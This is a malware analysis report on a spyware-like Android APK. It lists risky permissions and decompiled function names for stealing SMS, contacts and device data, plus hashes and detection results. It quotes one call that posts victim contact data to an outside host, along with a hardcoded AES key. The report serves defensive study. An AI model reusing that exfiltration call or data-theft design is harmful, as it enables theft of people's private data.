Basic Information:
------------------------------------------
Target OS: Android
File Type: Android archive file (APK)
Lang: Java
Size: 1.24M
MD5SUM: aec59ebd533124728bdb1637df7b5a35
Test Environment:
- Hybrid Analysis
 \
  |--> CrowdStrike Falcon
  |--> MetaDefender
  |--> VirusTotal
------------------------------------------

Permissions:
----------------------------------------------------
- android.permission.READ_SMS (RISKY)
 \
  |--> Allows an application to read SMS messages.

- android.permission.INTERNET
 \
  |--> Allows applications to open network sockets.

- android.permission.CAMERA (RISKY)
 \
  |--> Required to be able to access the camera device.

- android.permission.READ_EXTERNAL_STORAGE (RISKY)
 \
  |--> Allows an application to read from external storage.

- android.permission.WRITE_EXTERNAL_STORAGE (RISKY)
 \
  |--> Allows an application to write to external storage.

- android.permission.REQUEST_INSTALL_PACKAGES (RISKY)
 \
  |--> Allows an application to request installing packages.

- android.permission.READ_PHONE_STATE (RISKY)
 \
  |--> Allows read only access to phone state.

- android.permission.READ_CONTACTS (RISKY)
 \
  |--> Allows an application to read the user's contacts data.
----------------------------------------------------

Activities:
-------------------------------
- com.webview.WebViewActivity
-------------------------------

Providers:
-------------------------------------------
- android.support.v4.content.FileProvider
-------------------------------------------

Abilities:
--------------------------------------------------------------------
- This file tries to access the victim's SMS data and can probably send SMS messages to other devices.
 \
  |--> Function: "private static String getSMS(final Context context)"
  |--> Function: "public static void sendSms(final Context context, String s, final String s2)"

- This file tries to access the victim's contact data.
 \
  |--> Function: "private static String readContacts(final Context context)"

- This file sends information about the victim's device to remote hosts.
 \
  |--> Call: "UrlHttpUtil.post("http://www.apkeditor.cn/api/SendContactInfo.aspx", hashMap, new CallBackUtil())"

- This file probably downloads additional files to gain persistence on the victim's device.
 \
  |--> Function: "public static void downloadFile(final String s, final CallBackUtil.CallBackFile callBackFile)"

- This file possibly encrypts its data for remote communications.
 \
  |--> Function: "public static byte[] encryptData(final String s, final String s2, final String s3)"

- This file uses JavaScript to control its embedded web browser (WebView).
 \
  |--> Function: "public static String getAutoJs(final Activity activity, final String s)"
  |--> Class: "public class b extends WebChromeClient"

- This file probably dials other devices (places phone calls).
 \
  |--> Function: "public static void callDial(final Context context, final String str)"

- This file tries to collect information about the victim's device CPU.
 \
  |--> Function: "public static String readCpuInfo()"
--------------------------------------------------------------------

Interesting things:
-----------------------------------------------
- This file probably originates from an Asian country (China or Japan).
 \
  |--> String: "sb.append("WEiChong03_69");"
  |--> String: "hashMap.put("Phone", "badyun");"

- Found an invite code.
 \
  |--> String: "hashMap.put("InviteCode", "4FF2D8924C231112F0A04DB5EBC400DA");"

- Found an AES key.
 \
  |--> String: AES_KEY = "infoinfoinfoinfo";

- Found paths.
 \
  |--> String: FileUtils.PATH_DATA = "/sdcard/shurufadata/";
  |--> String: FileUtils.PATH_DATA_INFO = "/sdcard/shurufadata/info.txt";
  |--> String: FileUtils.PATH_DATA_WORD = "/sdcard/shurufadata/word.txt";
  |--> String: FileUtils.PATH_DATA_FLAG = "/sdcard/shurufadata/flag.log";
-----------------------------------------------

Detected by:
-----------------------------------------------
- VirusTotal
 \
  |--> 5/65

- Hybrid Analysis
 \
  |--> MetaDefender
   \-> Clean
   /
  |--> VirusTotal
   \-> 7%

- Scan reports
 \
  |--> VirusTotal
   \-> https://www.virustotal.com/gui/file/21d10aa53370fa15664545b00e86f35ae5f4a2b3f42e33291dc071e8b25e6e26/detection
   /
  |--> Hybrid Analysis
   \-> https://www.hybrid-analysis.com/sample/21d10aa53370fa15664545b00e86f35ae5f4a2b3f42e33291dc071e8b25e6e26
   \-> https://www.hybrid-analysis.com/sample/21d10aa53370fa15664545b00e86f35ae5f4a2b3f42e33291dc071e8b25e6e26/5fc14757f469f710a05529f1
-----------------------------------------------

Used Tools During Tests:
-----------------------------------------------
- Qu1cksc0pe
 \
  |--> https://github.com/CYB3RMX/Qu1cksc0pe

- Sandbox Environments
 \
  |--> https://www.virustotal.com
  |--> https://www.hybrid-analysis.com

- Dex2Jar
- Java decompiler
 \
  |--> http://www.javadecompilers.com/
-----------------------------------------------